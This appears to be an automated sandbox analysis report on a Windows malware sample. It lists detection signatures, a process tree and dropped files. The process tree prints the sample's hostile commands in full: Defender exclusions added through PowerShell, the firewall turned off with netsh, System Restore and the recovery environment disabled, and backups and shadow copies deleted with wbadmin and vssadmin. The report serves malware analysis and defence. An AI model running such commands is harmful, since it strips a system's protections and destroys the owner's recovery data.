Analysis

  • max time kernel
    150s
  • max time network
    128s
  • platform
    windows11-ltsc_2024_x64
  • resource
    win11ltsc2024-20260709-en
  • resource tags

    arch:x64arch:x86image:win11ltsc2024-20260709-enlocale:en-usos:windows11-ltsc_2024-x64systemwindows
  • submitted
    29/07/2026, 00:34

General

  • Target
    2026-07-28_ae2102521c9ee919a914bdcf93caa94a_icedid_luca-stealer_njrat_stealc.exe
  • Size 17.8MB
  • Sample260729-aw1pcsstd1
  • SHA256 7e74a48ebaf713b7ecc828938a114bf32a9d3383aa51df88434b5a04a7f7915f
  • MD5 SHA1 SHA512 SSDEEP TLSH

Malware Config

Signatures

  • Modifies WinLogon for persistence 2 TTPs 1 IoCs
  • UAC bypass 3 TTPs 1 IoCs
  • Deletes shadow copies 3 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Deletes system backups 3 TTPs 2 IoCs

    Uses wbadmin.exe to inhibit system recovery.

  • Modifies Windows Firewall 2 TTPs 2 IoCs
  • Drops file in System32 directory 2 IoCs
  • Drops file in Windows directory 10 IoCs
  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 6 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • Executes a command shell one-liner 1 TTPs 4 IoCs

    Execution of a cmd.exe one-liner (/c "close" or /k "keep") is a common script/loader stage.

  • Interacts with shadow copies 3 TTPs 1 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • Suspicious behavior: EnumeratesProcesses 60 IoCs
  • Suspicious use of AdjustPrivilegeToken 48 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs
  • System policy modification 1 TTPs 1 IoCs
  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

Processes

  • C:\Users\Admin\AppData\Local\Temp\2026-07-28_ae2102521c9ee919a914bdcf93caa94a_icedid_luca-stealer_njrat_stealc.exe
    "C:\Users\Admin\AppData\Local\Temp\2026-07-28_ae2102521c9ee919a914bdcf93caa94a_icedid_luca-stealer_njrat_stealc.exe"
    1⤵
    • Modifies WinLogon for persistence
    • UAC bypass
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    • System policy modification
    PID:3696
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -NoProfile -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp' -ErrorAction SilentlyContinue; Add-MpPreference -ExclusionPath 'C:\Windows' -ErrorAction SilentlyContinue"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:3188
    • C:\Windows\SYSTEM32\netsh.exe
      netsh advfirewall set allprofiles state off
      2⤵
      • Modifies Windows Firewall
      • Event Triggered Execution: Netsh Helper DLL
      PID:5376
    • C:\Windows\SYSTEM32\netsh.exe
      netsh advfirewall firewall add rule name="svchost" dir=in action=allow program="C:\Users\Admin\AppData\Local\Temp\2026-07-28_ae2102521c9ee919a914bdcf93caa94a_icedid_luca-stealer_njrat_stealc.exe" enable=yes
      2⤵
      • Modifies Windows Firewall
      • Event Triggered Execution: Netsh Helper DLL
      PID:5884
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command "Disable-ComputerRestore -Drive C:\ -ErrorAction SilentlyContinue; Start-Process cmd -ArgumentList '/c','reagentc /disable' -WindowStyle Hidden -Wait -ErrorAction SilentlyContinue; Start-Process cmd -ArgumentList '/c','wbadmin delete backup -backupTarget:C: -allVersions -quiet' -WindowStyle Hidden -Wait -ErrorAction SilentlyContinue; Start-Process cmd -ArgumentList '/c','wbadmin delete backup -backupTarget:D: -allVersions -quiet' -WindowStyle Hidden -Wait -ErrorAction SilentlyContinue; Start-Process cmd -ArgumentList '/c','vssadmin delete shadows /all /quiet' -WindowStyle Hidden -Wait -ErrorAction SilentlyContinue"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2352
      • C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /c reagentc /disable
        3⤵
        • Executes a command shell one-liner
        • Suspicious use of WriteProcessMemory
        PID:2552
        • C:\Windows\system32\ReAgentc.exe
          reagentc /disable
          4⤵
          • Drops file in System32 directory
          • Drops file in Windows directory
          PID:5568
      • C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /c wbadmin delete backup -backupTarget:C: -allVersions -quiet
        3⤵
        • Executes a command shell one-liner
        • Suspicious use of WriteProcessMemory
        PID:2768
        • C:\Windows\system32\wbadmin.exe
          wbadmin delete backup -backupTarget:C: -allVersions -quiet
          4⤵
          • Deletes system backups
          • Drops file in Windows directory
          PID:2104
      • C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /c wbadmin delete backup -backupTarget:D: -allVersions -quiet
        3⤵
        • Executes a command shell one-liner
        • Suspicious use of WriteProcessMemory
        PID:4572
        • C:\Windows\system32\wbadmin.exe
          wbadmin delete backup -backupTarget:D: -allVersions -quiet
          4⤵
          • Deletes system backups
          • Drops file in Windows directory
          PID:2000
      • C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /c vssadmin delete shadows /all /quiet
        3⤵
        • Executes a command shell one-liner
        • Suspicious use of WriteProcessMemory
        PID:2072
        • C:\Windows\system32\vssadmin.exe
          vssadmin delete shadows /all /quiet
          4⤵
          • Interacts with shadow copies
          PID:2848
  • C:\Windows\System32\svchost.exe
    C:\Windows\System32\svchost.exe -k netsvcs -p -s BDESVC
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    PID:2288
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    PID:940

Network

        MITRE ATT&CK Enterprise v16

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        StartupProfileData-NonInteractive

        • Path C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
        • Size 1KB
        • SHA256 df5de984121ab9eb702c2ef1c0716750e770551b5a5551fee347941d5bdfab01
        • MD5 SHA1 SHA512 TLSH

        __PSScriptPolicyTest_ovbuj4kg.3e4.ps1

        • Path C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ovbuj4kg.3e4.ps1
        • Size 60B
        • SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
        • MD5 SHA1 SHA512 TLSH

        memory/3188-10-0x0000025DF12A0000-0x0000025DF1352000-memory.dmp

        memory/3188-5-0x0000025DF10B0000-0x0000025DF10D2000-memory.dmp

        memory/3188-6-0x00007FFE2A760000-0x00007FFE2B104000-memory.dmp

        memory/3188-9-0x0000025DF1280000-0x0000025DF129E000-memory.dmp

        memory/3188-0-0x00007FFE2A8EF000-0x00007FFE2A8F0000-memory.dmp

        memory/3188-11-0x0000025DF1360000-0x0000025DF136A000-memory.dmp

        memory/3188-12-0x00007FFE2A760000-0x00007FFE2B104000-memory.dmp

        memory/3188-13-0x00007FFE2A760000-0x00007FFE2B104000-memory.dmp

        memory/3188-14-0x00007FFE2A760000-0x00007FFE2B104000-memory.dmp

        memory/3188-16-0x00007FFE2A760000-0x00007FFE2B104000-memory.dmp

        memory/3188-2-0x00007FFE2A760000-0x00007FFE2B104000-memory.dmp

        memory/3188-1-0x00007FFE2A760000-0x00007FFE2B104000-memory.dmp

        memory/3188-25-0x00007FFE2A760000-0x00007FFE2B104000-memory.dmp